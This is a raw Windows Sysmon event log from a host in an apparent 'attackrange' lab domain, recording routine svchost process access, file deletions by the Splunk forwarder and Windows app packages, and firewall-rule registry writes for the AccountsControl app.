12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.694{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CDBA6ECF8E3D1B3D53AE8DC6025D4CC,SHA256=E4FAC81A77982A3FE5EB2E44AFB9A6753DD9CD295FFE1B2D3CF457CABEAF5E7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.678{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.663{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A088A9FF143859B8C85D6B4C625243,SHA256=53C058B227DAD4E5204811C06D3072B22114B4ABA42F87659B75B5525D9A3BF3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-9|C=S-1-15-3-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|M=microsoft.accountscontrol_cw5n1h2txyewy|Name=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.AccountsControl_cw5n1h2txyewy\|PFN=Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{CB04DF19-985E-4DCF-A70A-8EB4AF96DFBC}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 23542300x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.647{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\Apps.indexMD5=D38A175DD3C786FE6065A00AD306D74F,SHA256=57D9784D2866D21A61FA5FB04373807EDCBF7FAF298A2894C482A6EA80D419FD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{F6F1BF33-31A0-42C1-B633-902A103D2E4B}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C0A81724-20CF-4CA9-9E89-80003929B603}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:17.647{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{65920A41-3AB7-4996-A8EB-9C75872C275D}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 11241100x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:17.632 23542300x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\Apps.ftMD5=F256707B0901454854702BF58E4DEF0B,SHA256=2603EF3B568C277FF92E75593C0969A0E24291BBC9419080B77D567A53825ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\Apps.dataMD5=09924E1BACD1740F5906D89DD6905D99,SHA256=98C574D4894041260AB499048E2B5CB9F58A58AA42B5DDFAE9C44D2BEEA9023D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\0.2.filtertrie.intermediate.txtMD5=C204E9FAAF8565AD333828BEFF2D786E,SHA256=D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\0.1.filtertrie.intermediate.txtMD5=34BD1DFB9F72CF4F86E6DF6DA0A9E49A,SHA256=8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{521a01b1-5b6c-41b6-ad58-79363f21599f}\0.0.filtertrie.intermediate.txtMD5=F975464F45E06A57B8FE3C4FFE644599,SHA256=41B65982C681DAFBA517CEA1878436C4FE1500C161A00B9A916661DB425D5FB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.632{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1898f399-c028-4710-b40c-a5a12eaa891f}\Apps.indexMD5=D38A175DD3C786FE6065A00AD306D74F,SHA256=57D9784D2866D21A61FA5FB04373807EDCBF7FAF298A2894C482A6EA80D419FD,IMPHASH=00000000000000000000000000000000falsetrue 